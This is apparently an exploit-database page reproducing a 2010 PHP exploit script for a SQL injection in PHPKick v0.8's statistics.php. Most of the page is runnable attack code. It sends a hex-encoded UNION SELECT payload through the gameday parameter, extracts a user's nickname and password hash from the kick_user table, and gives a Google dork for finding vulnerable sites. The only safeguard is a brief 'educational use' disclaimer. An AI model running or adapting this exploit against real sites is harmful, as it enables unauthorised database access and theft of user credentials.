header-logo
Suggest Exploit
vendor:
PHPKick
by:
garwga
N/A
CVSS
N/A
SQL Injection
Unknown
CWE
Product Name: PHPKick
Affected Version From: 0.8
Affected Version To: 0.8
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2010

PHPKick v0.8 statistics.php SQL Injection

This exploit allows an attacker to perform SQL injection on the statistics.php file in PHPKick v0.8. It works regardless of the PHP security settings, including magic_quotes and register_globals. This exploit is for educational purposes only and should not be used without permission. The exploit was found by garwga (ICQ#:453-144-667).

Mitigation:

Unknown
Source

Exploit-DB raw data:

# Exploit Title: PHPKick v0.8 statistics.php SQL Injection
# Date: August 8th, 2010
# Time: 03:45am ;(
# Author: garwga
# Version: 0.8
# Google dork : "© 2004 PHPKick.de Version 0.8"
# Category:  webapps/0day
# Code: see below
 
<?php
	echo"\n\n";
	echo"|=================PHPKick v0.8 statistics.php SQL Injection==================|\n";
	echo"|                                                                            |\n";
	echo"|Syntax: php ".$_SERVER['argv'][0]." [host] [path]                                       |\n";
	echo"|                                                                            |\n";
	echo"|Example: php ".$_SERVER['argv'][0]." http://www.domain.com /path/                       |\n";
    echo"|                                                                            |\n";
 
	echo"|Notes:This exploit works regardless of the PHP security settings            |\n";
    echo"|      (magic_quotes, register_globals).This exploit is only for educational |\n";
	echo"|      use, use it on your own risk! Exploiting scripts without permission of|\n";
	echo"|      the owner of the webspace is illegal!                                 |\n";
	echo"|      I'm not responsible for any resulting damage                          |\n";
	echo"|                                                                            |\n";
	echo"|Google Dork: \"© 2004 PHPKick.de Version 0.8\"                                |\n";
	echo"|                                                                            |\n";
	echo"|Exploit found by garwga (ICQ#:453-144-667)                                  |\n";
	echo"|============================================================================|\n\n\n";
 
 
if($_SERVER['argv'][1] && $_SERVER['argv'][2]){
	$host=$_SERVER['argv'][1];
	$path=$_SERVER['argv'][2];
    $spos=strpos($host, "http://");
  	if(!is_int($spos)&&($spos==0)){
	   $host="http://$host";
  	  }
	if(!$host=="http://localhost"){
	   $spos=strpos($host, "http://www.");
  	   if (!is_int($spos)&&($spos==0)){
	      $host="http://www.$host";
  	      }
	  }
	$exploit="statistics.php?action=overview&gameday=-32%20union%20select%201,2,3,4,0x2720756e696f6e2073656c65637420312c322c636f6e636174286e69636b2c273a272c70617373776f7274292c342c352c362c372066726f6d206b69636b5f757365722077686572652069643d2231222d2d2066,6,7,8--%20f";
	echo"exploiting...\n";
	$source=file_get_contents($host.$path.$exploit);
	$username=GetBetween($source," :<br>",":");
	echo "username: $username\n";
	$hash=GetBetween($source,"<br>$username:","</td>");
	echo"hash: $hash\n";
	}
else{
	echo"\n\n";
	echo"|=================PHPKick v0.8 statistics.php SQL Injection==================|\n";
	echo"|                                                                            |\n";
	echo"|Syntax: php ".$_SERVER['argv'][0]." [host] [path]                                       |\n";
	echo"|                                                                            |\n";
	echo"|Example: php ".$_SERVER['argv'][0]." http://www.domain.com /path/                       |\n";
    echo"|                                                                            |\n";
 
	echo"|Notes:This exploit works regardless of the PHP security settings            |\n";
    echo"|      (magic_quotes, register_globals).This exploit is only for educational |\n";
	echo"|      use, use it on your own risk! Exploiting scripts without permission of|\n";
	echo"|      the owner of the webspace is illegal!                                 |\n";
	echo"|      I'm not responsible for any resulting damage                          |\n";
	echo"|                                                                            |\n";
	echo"|Google Dork: \"© 2004 PHPKick.de Version 0.8\"                                |\n";
	echo"|                                                                            |\n";
	echo"|Exploit found by garwga (ICQ#:453-144-667)                                  |\n";
	echo"|============================================================================|\n";
}
function GetBetween($content,$start,$end){
    $r = explode($start, $content);
    if (isset($r[1])){
        $r = explode($end, $r[1]);
        return $r[0];
    }
    return '';
}
?>

Navigation

Suggest Exploit

Services By CQR

cqrsecured